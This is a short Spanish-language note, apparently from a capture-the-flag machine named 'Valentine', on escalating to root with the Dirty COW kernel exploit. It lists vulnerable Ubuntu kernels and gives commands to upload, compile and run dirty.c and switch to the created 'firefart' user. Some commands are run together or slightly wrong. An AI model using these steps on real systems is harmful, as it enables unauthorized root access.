Linux escalation
https://dirtycow.ninja/
son vulnerbles
- linux-image-4.8.0-26 (4.8.0-26.28) for Ubuntu 16.10
- linux-image-4.4.0-45 (4.4.0-45.66) for Ubuntu 16.04 LTS
- linux-image-3.13.0-100 (3.13.0-100.147) for Ubuntu 14.04 LTS
- linux-image-3.2.0-113 (3.2.0-113.155) for Ubuntu 12.04 LTS
- linux-image-4.4.0-1029-raspi2 (4.4.0-1029.36)
Para checar que tienes:
hype@Valentine:~$ uname -a hype@Valentine:~$ lsb_release -a
para usar por ejemplo la verción de c (dirty.c)
checas que este instalado gcc
which gcc
lo subes con httpserver
lo compilas y lo haces ejecutable
gcc -pthread dirty.c -o dirty -lcrypt chmod +x dirty.c ./dirty su firefart
firefart es el nuevo usuario
Si tienes una architectura diferente puedes forzarlo a usar otra. Por ejemplo la mia era 64 y necesitaba correrlo en una computadora que no tenia gcc t era 32.
gcc -pthread dirty.c -o dirty -lcrypt -m32
